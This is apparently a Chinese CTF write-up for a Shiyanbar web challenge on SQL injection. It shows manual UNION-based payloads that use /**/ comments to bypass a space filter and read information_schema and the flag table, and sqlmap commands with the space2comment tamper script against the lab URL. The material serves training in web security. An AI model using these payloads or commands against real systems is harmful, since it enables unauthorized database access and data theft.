ctfCTF-Web安全

实验吧-web-简单的sql注入2

2019-01-29  本文已影响1人  简言之_

本系列文集:实验吧-Write up --将持续更新 觉得还不错请给个喜欢,感谢!

方法一手动注入

简单的注入测试:
1   正常
1'  报错
1' or '1'='1    SQLi detected!
1'or'1'='1      全部数据
以上说明空格被过滤掉

1.查询数据库中的表(用/**/绕过空格)

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
图片.png
发现flag表
2.查询flag表中字段名
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
图片.png
发现flag字段名
3.最后构造出poc
1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
图片.png
方法二sqlmap注入
点击了解sqlmap详细用法:sqlmap用于sql注入语法

1.查询当前数据库(空格被过滤可以使用tamper脚本中space2comment)
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs

图片.png
发现web1数据库
2.查询数据库中的表
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --tables -D web1 图片.png
发现flag表
3.查询flag表中字段名
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --columns -T flag -D web1 图片.png
发现flag字段
4.查询字段flag信息
sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dump -C flag -T flag -D web1 图片.png
上一篇 下一篇

猜你喜欢

热点阅读